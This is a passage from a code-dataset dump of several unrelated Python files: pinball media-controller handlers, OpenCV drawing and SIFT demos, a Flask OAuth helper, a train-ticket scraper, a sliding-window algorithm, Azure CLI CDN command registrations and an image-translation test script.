implement the 'get' command at\n this time, but it's included here for completeness since the 'get'\n command is part of the BCP 1.0 specification so we don't want to return\n an error if we receive an incoming 'get' command.\n\n \"\"\"\n pass\n\n def bcp_set(self, **kwargs):\n \"\"\"Processes an incoming BCP 'set' command.\n\n Note that this media controller doesn't implement the 'set' command at\n this time, but it's included here for completeness since the 'set'\n command is part of the BCP 1.0 specification so we don't want to return\n an error if we receive an incoming 'set' command.\n\n \"\"\"\n pass\n\n def bcp_shot(self, name, profile, state):\n \"\"\"The MPF media controller uses triggers instead of shots for its\n display events, so we don't need to pay attention here.\"\"\"\n pass\n\n def bcp_config(self, **kwargs):\n \"\"\"Processes an incoming BCP 'config' command.\"\"\"\n for k, v in kwargs.iteritems():\n if k.startswith('volume_'):\n self.bcp_set_volume(track=k.split('volume_')[1], value=v)\n\n def bcp_timer(self, name, action, **kwargs):\n \"\"\"Processes an incoming BCP 'timer' command.\"\"\"\n pass\n\n def bcp_set_volume(self, track, value):\n \"\"\"Sets the volume based on an incoming BCP 'config' command.\n\n Args:\n track: String name of the track the volume will set.\n value: Float between 0 and 1 which represents the volume 
level to\n set.\n\n Note: At this time only the master volume can be set with this method.\n\n \"\"\"\n if track == 'master':\n self.sound.set_volume(value)\n\n #if track in self.sound.tracks:\n #self.sound.tracks[track]\n\n # todo add per-track volume support to sound system\n\n def get_debug_status(self, debug_path):\n\n if self.options['loglevel'] > 10 or self.options['consoleloglevel'] > 10:\n return True\n\n class_, module = debug_path.split('|')\n\n try:\n if module in self.active_debugger[class_]:\n return True\n else:\n return False\n except KeyError:\n return False\n\n\n# The MIT License (MIT)\n\n# Copyright (c) 2013-2015 Brian Madden and Gabe Knuth\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n","sub_path":"mpf/media_controller/core/media_controller.py","file_name":"media_controller.py","file_ext":"py","file_size_in_byte":22412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271711424","text":"#!/usr/bin/python\n\nimport cv2\nimport numpy as np\n\ndef process_image(image):\n \n blue=[150,0,0]\n green=[0,200,0]\n white=[220,220,220]\n\n thickness = 2\n line_type = cv2.CV_AA\n\n eye1=(266,266)\n eye2=(330,266)\n eye_radius=20\n\n face_center=(290, 280)\n face_size=(80, 110)\n face_angle = 15;\n\n theText = \"A face and two eyes\"\n font = cv2.FONT_HERSHEY_SIMPLEX\n font_scale = 1\n font_thickness = 1\n font_start=(100, 100)\n\n text_size,base_line = cv2.getTextSize(theText, font, font_scale, font_thickness)\n \n border=(20,20)\n\n p1 = (font_start[0]-border[0],font_start[1]-text_size[1]-border[1])\n p2 = (font_start[0]+text_size[0]+border[0],font_start[1]+border[1])\n\n font_middle=(font_start[0]+text_size[0]/2,font_start[1])\n \n \n\n # Start drawing\n #Eye\n cv2.circle(image, eye1, eye_radius, green, thickness, line_type);\n cv2.circle(image, eye2, eye_radius, green, thickness, line_type);\n #Face\n cv2.ellipse(image, face_center, face_size, face_angle, 0, 360, green, thickness, line_type);\n \n cv2.line(image, font_middle, face_center, blue, thickness, line_type);\n #Rectangle\n cv2.rectangle(image, p1, p2, blue, -1, line_type);\n\n\n #Text\n cv2.putText(image, theText, font_start, font, font_scale, white, thickness, line_type);\n \n\n\ndef display_graphics(image):\n cv2.imshow(\"Image\",image)\n\ndef main():\n \n cv2.namedWindow(\"Image\")\n\n image=cv2.imread(\"lena.jpg\")\n \n process_image(image)\n display_graphics(image)\n\n cv2.imwrite(\"lena_m.jpg\",image)\n \n\n cv2.waitKey(0)\n 
cv2.destroyAllWindows()\n\n\n\n\n\n\n\n\n\nif __name__==\"__main__\":\n    \n    main()    \n    \n","sub_path":"opencv_computer_vision_application_programming/2/2-5-Drawing-Shape/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"424379765","text":"\n\nfrom xai.brain.wordbase.verbs._harangue import _HARANGUE\n\n#class header\nclass _HARANGUES(_HARANGUE, ):\n\tdef __init__(self,): \n\t\t_HARANGUE.__init__(self)\n\t\tself.name = \"HARANGUES\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"harangue\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_harangues.py","file_name":"_harangues.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"576311017","text":"# -*- coding: utf-8 -*-\nfrom flask import session, flash, redirect, url_for\nfrom flask.ext.login import login_user\nfrom apps import db\nfrom apps.models import User\n\n\ndef OAuth2RegisterToUser(user_data, type):\n    \n    user = User.query.filter_by(id=user_data.get('id')).first()\n\n\n    if user is None:\n        \n        if type == 'FACEBOOK':\n            user = User(\n                id=user_data['id'],\n                name=user_data['name'],\n                picture=\"http://graph.facebook.com/%s/picture\" % user_data['id'],\n                gender=user_data['gender']\n            )\n            db.session.add(user)\n            db.session.commit()\n    \n    #\n    # @users\n    #\n    users = User.query.filter_by(id=user.id)\n\n    if users.count() > 1:\n        return 409\n\n    user = users.first()\n    #\n\n    if user:\n        if login_user(user):\n            return 200\n        else:\n            return 500\n\n\ndef OAuthSessionPop():\n    OAUTH_PROVIDER = ['oauth_token']\n    for provider in OAUTH_PROVIDER:\n        session.pop(provider, None)\n\n
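\n# status codes used below: 200 = login succeeded, 409 = duplicate user email,\n# 500 = user registration failed\n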
def OAuthRegisterAndLoginRedirect(register_result):\n    if register_result == 200:\n        flash(u\"Login successful.\", \"success\")\n        return redirect(url_for('main'))\n    elif register_result == 409:\n        flash(u\"Duplicate user email.\", \"warning\")\n        return redirect(url_for('login'))\n    elif register_result == 500:\n        flash(u\"User registration failed. Please try again.\", \"error\")\n        return redirect(url_for('login'))","sub_path":"core/OAuthManagement.py","file_name":"OAuthManagement.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"67851077","text":"#python3.7\r\n#Filename:爬取火车票信息(已知时间和始终站).py\r\n\r\n#后续:文本文件的返回页面设置\r\n#优化:异常处理,搜索时间的设置(当日往后一个月)\r\n\r\nimport requests,openpyxl\r\nimport os,json,re\r\nimport station_name_code\r\n\r\npath = \"C:\\\\Users\\\\15394\\\\Desktop\\\\\"\r\nprint(\"保存在\",path)\r\n\r\ndef getDatas(year,month,date,_from,_to):\r\n    headers = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36\"}\r\n    params = [{\r\n        \"leftTicketDTO.train_date\":str(year)+\"-\"+str(month)+\"-\"+str(date),\r\n        \"leftTicketDTO.from_station\":_from,\r\n        \"leftTicketDTO.to_station\":_to,\r\n        \"purpose_codes\":\"ADULT\"\r\n    }]\r\n    url = \"https://kyfw.12306.cn/otn/leftTicket/query\"\r\n    for i in params:\r\n        res = requests.get(url,params=i)\r\n        res = json.loads(res.text)\r\n        datas = res[\"data\"][\"result\"]\r\n        #print(datas) #页面的所有火车票信息(字符串列表)\r\n    return datas\r\n\r\n#对单条信息筛选\r\ndef _re(data):\r\n    message = data.split(\"|\") #经过拆分可看出“预定”都是在第二个(索引为1)\r\n    #print(message)\r\n    return message #单条火车信息组成的列表\r\n\r\n#对信息输出\r\ndef prt(mes):\r\n    a = mes[3] #车次\r\n    b1 = code(mes[4]) #始站(更改为汉字)\r\n    b2 = code(mes[5]) #终站(更改为汉字)\r\n    b3 = code(mes[6]) #出发站\r\n    b4 = code(mes[7]) #到达站\r\n    time1 = mes[8] #出发时间\r\n    time2 = mes[9] #到达时间\r\n    time3 = mes[10] #历时\r\n    time4 = mes[13] #日期\r\n    c1 = mes[32] #商务座(特等座)\r\n    c2 = mes[31] #一等座\r\n    c3 = mes[30] #二等座\r\n    c4 = mes[21] #高级软卧\r\n    c5 = mes[23] #软卧一等卧\r\n    c6 = mes[33] #动卧\r\n    c7 = mes[28] #硬卧二等卧\r\n    c8 = mes[24] #软座\r\n    c9 = mes[29] #硬座\r\n    c10 = mes[26] #无座\r\n    l = [a,b1,b2,b3,b4,time1,time2,time3,time4,c1,c2,c3,c4,c5,c6,c7,c8,c9,c10]\r\n    for i in range(len(l)):\r\n        if l[i]==\"\":\r\n            l[i] = \"无\"\r\n    dic = {\"车次\":l[0],\"始站\":l[1],\"终站\":l[2],\"出发站\":l[3],\"到达站\":l[4],\r\n           \"出发时间\":l[5],\"到达时间\":l[6],\"历时\":l[7],\"日期\":l[8],\r\n           \"商务座\":l[9],\"一等座\":l[10],\"二等座\":l[11],\"高级软卧\":l[12],\"软卧一等卧\":l[13],\r\n           \"动卧\":l[14],\"硬卧二等卧\":l[15],\"软座\":l[16],\"硬座\":l[17],\"无座\":l[18]}\r\n    list0 = [\"车次:\",l[0],\"始站:\",l[1],\"终站:\",l[2],\"出发站:\",l[3],\"到达站:\",l[4],\r\n             \"出发时间:\",l[5],\"到达时间:\",l[6],\"历时:\",l[7],\"日期:\",l[8],\r\n             \"商务座:\",l[9],\"一等座:\",l[10],\"二等座:\",l[11],\"高级软卧:\",l[12],\"软卧一等卧:\",l[13],\r\n             \"动卧:\",l[14],\"硬卧二等卧:\",l[15],\"软座:\",l[16],\"硬座:\",l[17],\"无座:\",l[18]]\r\n    return list0,dic\r\n\r\n#文本返回保存\r\ndef txt_format(l): #文本格式优化\r\n    for i in range(1,len(l),2):\r\n        l[i] = \"{0:{1}<5}\\t\".format(l[i],chr(12288))\r\n    l = \"\".join(l)\r\n    return l\r\n\r\ndef _file(m): #保存为txt文件或直接输出\r\n    with open(path+\"火车票.txt\",\"a\") as f:\r\n        f.write(m)\r\n\r\ndef _excel(l,i): #保存为excel文件\r\n    while os.path.exists(path+\"火车票.xlsx\") == False:\r\n        wb = openpyxl.Workbook()\r\n        sheet = wb.active\r\n        sheet.title = \"火车票信息\"\r\n        wb.save(path+\"火车票.xlsx\")\r\n    wb = openpyxl.load_workbook(path+\"火车票.xlsx\")\r\n    #sheet = wb[\"火车票信息:{} 至 {}\".format(_from,_to)]\r\n    sheet = wb[\"火车票信息\"]\r\n    if sheet[\"A1\"].value == None:\r\n        sheet[\"A1\"] = l[0].replace(\":\",\"\")\r\n        sheet[\"B1\"] = l[2].replace(\":\",\"\")\r\n        sheet[\"C1\"] = l[4].replace(\":\",\"\")\r\n        sheet[\"D1\"] = l[6].replace(\":\",\"\")\r\n        sheet[\"E1\"] = l[8].replace(\":\",\"\")\r\n        sheet[\"F1\"] = l[10].replace(\":\",\"\")\r\n        sheet[\"G1\"] = l[12].replace(\":\",\"\")\r\n        sheet[\"H1\"] = 
l[14].replace(\":\",\"\")\r\n sheet[\"I1\"] = l[16].replace(\":\",\"\")\r\n sheet[\"J1\"] = l[18].replace(\":\",\"\")\r\n sheet[\"K1\"] = l[20].replace(\":\",\"\")\r\n sheet[\"L1\"] = l[22].replace(\":\",\"\")\r\n sheet[\"M1\"] = l[24].replace(\":\",\"\")\r\n sheet[\"N1\"] = l[26].replace(\":\",\"\")\r\n sheet[\"O1\"] = l[28].replace(\":\",\"\")\r\n sheet[\"P1\"] = l[30].replace(\":\",\"\")\r\n sheet[\"Q1\"] = l[32].replace(\":\",\"\")\r\n sheet[\"R1\"] = l[34].replace(\":\",\"\")\r\n sheet[\"S1\"] = l[36].replace(\":\",\"\")\r\n i = str(i)\r\n sheet[\"A\"+i] = l[1]\r\n sheet[\"B\"+i] = l[3]\r\n sheet[\"C\"+i] = l[5]\r\n sheet[\"D\"+i] = l[7]\r\n sheet[\"E\"+i] = l[9]\r\n sheet[\"F\"+i] = l[11]\r\n sheet[\"G\"+i] = l[13]\r\n sheet[\"H\"+i] = l[15]\r\n sheet[\"I\"+i] = l[17]\r\n sheet[\"J\"+i] = l[19]\r\n sheet[\"K\"+i] = l[21]\r\n sheet[\"L\"+i] = l[23]\r\n sheet[\"M\"+i] = l[25]\r\n sheet[\"N\"+i] = l[27]\r\n sheet[\"O\"+i] = l[29]\r\n sheet[\"P\"+i] = l[31]\r\n sheet[\"Q\"+i] = l[33]\r\n sheet[\"R\"+i] = l[35]\r\n sheet[\"S\"+i] = l[37]\r\n wb.save(path+\"火车票.xlsx\")\r\n\r\n\r\n#运行顺序\r\ndef go_txt(year,month,date,_from,_to): #保存为txt\r\n datas = getDatas(year,month,date,code(_from),code(_to))\r\n for data in datas:\r\n mes = _re(data)\r\n l = prt(mes)[0]\r\n m = txt_format(l)\r\n print(m,\"\\n\") #返回到屏幕\r\n _file(m) #保存为txt\r\n\r\ndef go_excel(year,month,date,_from,_to): #保存为excel\r\n datas = getDatas(year,month,date,code(_from),code(_to))\r\n i = 2\r\n for data in datas:\r\n mes = _re(data)\r\n l = prt(mes)[0]\r\n _excel(l,i) #保存为excel\r\n i += 2\r\n\r\n#汉字编码转换\r\ndef code(name):\r\n name_code = station_name_code.dic()[0]\r\n code_name = station_name_code.dic()[1]\r\n if name in name_code:\r\n return name_code[name]\r\n elif name in code_name:\r\n return code_name[name]\r\n else:\r\n print(\"站点不存在\")\r\n\r\ndef main():\r\n year=input(\"输入年份(如:2019):\")\r\n month=input(\"输入月份(如:01):\")\r\n date=input(\"输入日期(如:01):\")\r\n _from=input(\"输入出发站(如:北京):\")\r\n _to=input(\"输入到达站(如:北京):\")\r\n choice=int(input(\"返回至屏幕和txt文件输入“0”,返回至excel文件输入“1”:\"))\r\n if choice == 0:\r\n try:\r\n go_txt(year,month,date,_from,_to) #txt文件和(或)返回到屏幕\r\n except:\r\n print(\"未找到\")\r\n else:\r\n try:\r\n go_excel(year,month,date,_from,_to) #excel表格\r\n except:\r\n print(\"未找到\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n print(\"Done\")\r\n","sub_path":"可选日期和始终站/爬取火车票信息(json).py","file_name":"爬取火车票信息(json).py","file_ext":"py","file_size_in_byte":6760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"132805908","text":"# 340. Longest Substring with At Most K Distinct Characters\n# Example 1:\n\n# Input: s = \"eceba\", k = 2\n# Output: 3\n# Explanation: T is \"ece\" which its length is 3.\n# Example 2:\n\n# Input: s = \"aa\", k = 1\n# Output: 2\n# Explanation: T is \"aa\" which its length is 2.\n\nfrom collections import defaultdict\n\n\n# using a dynamic sliding window that expands and contracts\n# update a min length to return each iteration\n\ndef lengthOfLongestSubstringKDistinct(s, k):\n l, r, length, map = 0, 0, 0, defaultdict(int)\n\n for r in range(len(s)):\n # always put the new value in the map. 
Expand\n map[s[r]] += 1\n\n # contract\n while len(map) > k:\n\n map[s[l]] -= 1\n # if when we contract and remove values if the mapping value is 0 remove it\n if map[s[l]] == 0:\n del map[s[l]]\n l += 1\n\n length = max(length, r-l + 1)\n return length\n\n\nprint(lengthOfLongestSubstringKDistinct(\"eceba\", 2)) # 3\nprint(lengthOfLongestSubstringKDistinct(\"aa\", 1)) # 2\n","sub_path":"SlidingWindow/LongestSubstringWithAtMostKDistinctCharacters.py","file_name":"LongestSubstringWithAtMostKDistinctCharacters.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"63602230","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nfrom knack.util import CLIError\n\nfrom azure.cli.core.commands import CliCommandType\n\nfrom ._client_factory import (cf_cdn, cf_custom_domain, cf_endpoints, cf_profiles, cf_origins, cf_resource_usage,\n cf_edge_nodes, cf_waf_policy, cf_waf_rule_set)\n\n\ndef _not_found(message):\n def _inner_not_found(ex):\n from azure.mgmt.cdn.models import ErrorResponseException\n if isinstance(ex, ErrorResponseException) \\\n and ex.response is not None \\\n and ex.response.status_code == 404:\n raise CLIError(message)\n raise ex\n return _inner_not_found\n\n\n_not_found_msg = \"{}(s) not found. Please verify the resource(s), group or it's parent resources \" \\\n \"exist.\"\n\n\n# pylint: disable=too-many-statements\ndef load_command_table(self, _):\n profile_not_found_msg = _not_found_msg.format('Profile')\n endpoint_not_found_msg = _not_found_msg.format('Endpoint')\n cd_not_found_msg = _not_found_msg.format('Custom Domain')\n origin_not_found_msg = _not_found_msg.format('Origin')\n waf_policy_not_found_msg = _not_found_msg.format('WAF Policy')\n\n cdn_sdk = CliCommandType(\n operations_tmpl='azure.mgmt.cdn#CdnManagementClient.{}',\n client_factory=cf_cdn\n )\n\n cdn_endpoints_sdk = CliCommandType(\n operations_tmpl='azure.mgmt.cdn.operations#EndpointsOperations.{}',\n client_factory=cf_endpoints,\n exception_handler=_not_found(endpoint_not_found_msg)\n )\n\n cdn_profiles_sdk = CliCommandType(\n operations_tmpl='azure.mgmt.cdn.operations#ProfilesOperations.{}',\n client_factory=cf_profiles,\n exception_handler=_not_found(profile_not_found_msg)\n )\n\n cdn_domain_sdk = CliCommandType(\n operations_tmpl='azure.mgmt.cdn.operations#CustomDomainsOperations.{}',\n client_factory=cf_custom_domain,\n exception_handler=_not_found(cd_not_found_msg)\n )\n\n cdn_origin_sdk = CliCommandType(\n operations_tmpl='azure.mgmt.cdn.operations#OriginsOperations.{}',\n client_factory=cf_origins,\n exception_handler=_not_found(origin_not_found_msg)\n )\n\n cdn_edge_sdk = CliCommandType(\n operations_tmpl='azure.mgmt.cdn.operations#EdgeNodesOperations.{}',\n client_factory=cf_edge_nodes\n )\n\n cdn_usage_sdk = CliCommandType(\n operations_tmpl='azure.mgmt.cdn.operations#ResourceUsageOperations.{}',\n client_factory=cf_resource_usage\n )\n\n cdn_waf_policy_sdk = CliCommandType(\n operations_tmpl='azure.mgmt.cdn.operations#PoliciesOperations.{}',\n client_factory=cf_waf_policy,\n exception_handler=_not_found(waf_policy_not_found_msg)\n )\n\n with self.command_group('cdn', cdn_sdk) as g:\n g.command('name-exists', 
'check_name_availability')\n\n with self.command_group('cdn', cdn_usage_sdk) as g:\n g.command('usage', 'list')\n\n with self.command_group('cdn endpoint', cdn_endpoints_sdk) as g:\n for name in ['start', 'stop', 'delete']:\n g.command(name, name, supports_no_wait=True)\n g.show_command('show', 'get')\n g.command('list', 'list_by_profile')\n g.command('load', 'load_content', supports_no_wait=True)\n g.command('purge', 'purge_content', supports_no_wait=True)\n g.command('validate-custom-domain', 'validate_custom_domain')\n g.custom_command('create', 'create_endpoint', client_factory=cf_cdn,\n doc_string_source='azure.mgmt.cdn.models#Endpoint',\n supports_no_wait=True)\n g.generic_update_command('update', setter_name='update', setter_arg_name='endpoint_update_properties',\n custom_func_name='update_endpoint',\n doc_string_source='azure.mgmt.cdn.models#EndpointUpdateParameters',\n supports_no_wait=True)\n\n with self.command_group('cdn endpoint waf policy', cdn_endpoints_sdk, is_preview=True) as g:\n g.custom_show_command('show', 'show_endpoint_waf_policy_link', client_factory=cf_endpoints)\n g.custom_command('set', 'set_endpoint_waf_policy_link', client_factory=cf_endpoints)\n g.custom_command('remove', 'remove_endpoint_waf_policy_link', client_factory=cf_endpoints, confirmation=True)\n\n with self.command_group('cdn endpoint rule', cdn_endpoints_sdk, is_preview=True) as g:\n g.show_command('show', 'get')\n g.custom_command('add', 'add_rule', client_factory=cf_cdn,\n doc_string_source='azure.mgmt.cdn.models#Endpoint')\n g.custom_command('remove', 'remove_rule', client_factory=cf_cdn,\n doc_string_source='azure.mgmt.cdn.models#Endpoint')\n\n with self.command_group('cdn endpoint rule condition', cdn_endpoints_sdk, is_preview=True) as g:\n g.show_command('show', 'get')\n g.custom_command('add', 'add_condition', client_factory=cf_cdn,\n doc_string_source='azure.mgmt.cdn.models#Endpoint')\n g.custom_command('remove', 'remove_condition', client_factory=cf_cdn,\n doc_string_source='azure.mgmt.cdn.models#Endpoint')\n\n with self.command_group('cdn endpoint rule action', cdn_endpoints_sdk, is_preview=True) as g:\n g.show_command('show', 'get')\n g.custom_command('add', 'add_action', client_factory=cf_cdn,\n doc_string_source='azure.mgmt.cdn.models#Endpoint')\n g.custom_command('remove', 'remove_action', client_factory=cf_cdn,\n doc_string_source='azure.mgmt.cdn.models#Endpoint')\n\n with self.command_group('cdn profile', cdn_profiles_sdk) as g:\n g.show_command('show', 'get')\n g.command('usage', 'list_resource_usage')\n g.command('delete', 'delete')\n g.custom_command('list', 'list_profiles', client_factory=cf_cdn)\n g.custom_command('create', 'create_profile', client_factory=cf_cdn)\n g.generic_update_command('update', setter_name='update', custom_func_name='update_profile',\n doc_string_source='azure.mgmt.cdn.models#ProfileUpdateParameters')\n\n with self.command_group('cdn custom-domain', cdn_domain_sdk) as g:\n g.show_command('show', 'get')\n g.command('delete', 'delete')\n g.command('list', 'list_by_endpoint')\n g.custom_command('create', 'create_custom_domain', client_factory=cf_cdn)\n g.custom_command('enable-https', 'enable_custom_https', client_factory=cf_cdn)\n g.command('disable-https', 'disable_custom_https')\n\n with self.command_group('cdn origin', cdn_origin_sdk) as g:\n g.show_command('show', 'get')\n g.command('list', 'list_by_endpoint')\n\n with self.command_group('cdn edge-node', cdn_edge_sdk) as g:\n g.command('list', 'list')\n\n with self.command_group('cdn waf policy', 
cdn_waf_policy_sdk, is_preview=True) as g:\n g.show_command('show', 'get')\n g.command('list', 'list')\n g.custom_command('set', 'set_waf_policy', client_factory=cf_waf_policy)\n g.command('delete', 'delete', confirmation=True)\n\n with self.command_group('cdn waf policy managed-rule-set', cdn_waf_policy_sdk, is_preview=True) as g:\n g.custom_command('add', 'add_waf_policy_managed_rule_set', client_factory=cf_waf_policy)\n g.custom_command('remove',\n 'remove_waf_policy_managed_rule_set',\n client_factory=cf_waf_policy,\n confirmation=True)\n g.custom_command('list', 'list_waf_policy_managed_rule_sets', client_factory=cf_waf_policy)\n g.custom_show_command('show', 'show_waf_policy_managed_rule_set', client_factory=cf_waf_policy)\n g.custom_command('list-available', 'list_waf_managed_rule_set', client_factory=cf_waf_rule_set)\n\n with self.command_group('cdn waf policy managed-rule-set rule-group-override',\n cdn_waf_policy_sdk,\n is_preview=True) as g:\n g.custom_command('set', 'set_waf_managed_rule_group_override', client_factory=cf_waf_policy)\n g.custom_command('delete',\n 'delete_waf_managed_rule_group_override',\n client_factory=cf_waf_policy,\n confirmation=True)\n g.custom_command('list', 'list_waf_policy_managed_rule_group_overrides', client_factory=cf_waf_policy)\n g.custom_show_command('show', 'show_waf_managed_rule_group_override', client_factory=cf_waf_policy)\n g.custom_command('list-available', 'list_waf_managed_rule_groups', client_factory=cf_waf_rule_set)\n\n with self.command_group('cdn waf policy custom-rule', cdn_waf_policy_sdk, is_preview=True) as g:\n g.custom_command('set', 'set_waf_custom_rule', client_factory=cf_waf_policy)\n g.custom_command('delete', 'delete_waf_custom_rule', client_factory=cf_waf_policy, confirmation=True)\n g.custom_command('list', 'list_waf_custom_rules', client_factory=cf_waf_policy)\n g.custom_show_command('show', 'show_waf_custom_rule', client_factory=cf_waf_policy)\n\n with self.command_group('cdn waf policy rate-limit-rule', cdn_waf_policy_sdk, is_preview=True) as g:\n g.custom_command('set', 'set_waf_rate_limit_rule', client_factory=cf_waf_policy)\n g.custom_command('delete', 'delete_waf_rate_limit_rule', client_factory=cf_waf_policy, confirmation=True)\n g.custom_command('list', 'list_waf_rate_limit_rules', client_factory=cf_waf_policy)\n g.custom_show_command('show', 'show_waf_rate_limit_rule', client_factory=cf_waf_policy)\n","sub_path":"src/azure-cli/azure/cli/command_modules/cdn/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":9943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"145961594","text":"import cv2\r\nimport numpy as np\r\n\r\nimg = cv2.imread('imageresized_0.jpg')\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\nsift = cv2.xfeatures2d.SIFT_create()\r\ndetector = sift.detect(gray, None)\r\n\r\nkpts, des = sift.compute(gray, detector)\r\n# kpts,des=descriptor.compute(gray,kpts)\r\nim_with_keypoints = cv2.drawKeypoints(gray, kpts, np.array([]), color=255, flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\r\n\r\ncv2.imshow(\"Keypoints\", im_with_keypoints)\r\ncv2.waitKey()","sub_path":"odd_pys/keypoints/kp.py","file_name":"kp.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"72398077","text":"import os, glob, cv2, time\nfrom options.test_options import TestOptions\nfrom data import create_dataset\nfrom models import create_model\nfrom 
util.visualizer import save_images\nfrom util import html\nimport numpy as np\nfrom scipy.signal import convolve2d\n\n\ndef MSE(pic1, pic2):\n return np.sum(np.square(pic1 - pic2)) / (pic1.shape[0] * pic1.shape[1])\n\n\ndef matlab_style_gauss2D(shape=(3, 3), sigma=0.5):\n \"\"\"\n 2D gaussian mask - should give the same result as MATLAB's\n fspecial('gaussian',[shape],[sigma])\n \"\"\"\n m, n = [(ss - 1.) / 2. for ss in shape]\n y, x = np.ogrid[-m:m + 1, -n:n + 1]\n h = np.exp(-(x * x + y * y) / (2. * sigma * sigma))\n h[h < np.finfo(h.dtype).eps * h.max()] = 0\n sumh = h.sum()\n if sumh != 0:\n h /= sumh\n return h\n\n\ndef filter2(x, kernel, mode='same'):\n return convolve2d(x, np.rot90(kernel, 2), mode=mode)\n\n\ndef compute_ssim(im1, im2, k1=0.01, k2=0.03, win_size=11, L=255):\n if not im1.shape == im2.shape:\n raise ValueError(\"Input images must have the same dimensions\")\n if len(im1.shape) > 2:\n raise ValueError(\"Please input the images with 1 channel\")\n\n M, N = im1.shape\n C1 = (k1 * L) ** 2\n C2 = (k2 * L) ** 2\n window = matlab_style_gauss2D(shape=(win_size, win_size), sigma=1.5)\n window = window / np.sum(np.sum(window))\n\n if im1.dtype == np.uint8:\n im1 = np.double(im1)\n if im2.dtype == np.uint8:\n im2 = np.double(im2)\n\n mu1 = filter2(im1, window, 'valid')\n mu2 = filter2(im2, window, 'valid')\n mu1_sq = mu1 * mu1\n mu2_sq = mu2 * mu2\n mu1_mu2 = mu1 * mu2\n sigma1_sq = filter2(im1 * im1, window, 'valid') - mu1_sq\n sigma2_sq = filter2(im2 * im2, window, 'valid') - mu2_sq\n sigmal2 = filter2(im1 * im2, window, 'valid') - mu1_mu2\n\n ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigmal2 + C2)) / ((mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2))\n\n return np.mean(np.mean(ssim_map))\n\n\nif __name__ == '__main__':\n opt = TestOptions().parse() # get test options\n # opt.epoch = 200\n # hard-code some parameters for test\n opt.num_threads = 0 # test code only supports num_threads = 0\n # opt.batch_size = 1 # test code only supports batch_size = 1\n opt.serial_batches = True # disable data shuffling; comment this line if results on randomly chosen images are needed.\n opt.no_flip = True # no flip; comment this line if results on flipped images are needed.\n opt.load_size = opt.crop_size\n opt.display_id = -1 # no visdom display; the test code saves the results to an HTML file.\n opt.dataset_mode = 'unaligned' + ('_single_dir' if opt.single_dir else '')\n dataset = create_dataset(opt) # create a dataset given opt.dataset_mode and other options\n model = create_model(opt) # create a model given opt.model and other options\n model.setup(opt) # regular setup: load and print networks; create schedulers\n # create a website\n web_dir = os.path.join(opt.results_dir, opt.name, '%s_%s' % (opt.phase, opt.epoch)) # define the website directory\n webpage = html.HTML(web_dir, 'Experiment = %s, Phase = %s, Epoch = %s' % (opt.name, opt.phase, opt.epoch))\n # test with eval mode. This only affects layers like batchnorm and dropout.\n # For [pix2pix]: we use batchnorm and dropout in the original pix2pix. 
You can experiment it with and without eval() mode.\n # For [CycleGAN]: It should not affect CycleGAN as CycleGAN uses instancenorm without dropout.\n starttime = time.time()\n lasttime = starttime\n\n if opt.eval:\n model.eval()\n starttime = time.time()\n for i, data in enumerate(dataset):\n if i >= opt.num_test: # only apply our model to opt.num_test images.\n break\n model.set_input(data) # unpack data from data loader\n model.test() # run inference\n visuals = model.get_current_visuals() # get image results\n img_path = model.get_image_paths() # get image paths\n if i % 1 == 0: # save images to an HTML file\n print('processing (%04d)-th image... %s' % (len(img_path) + (i) * opt.batch_size, ''), 'cost',\n time.time() - lasttime, 'seconds')\n lasttime = time.time()\n save_images(webpage, visuals, img_path, aspect_ratio=opt.aspect_ratio, width=opt.display_winsize)\n webpage.save() # save the HTML\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"27190800","text":"# -*- coding: utf-8 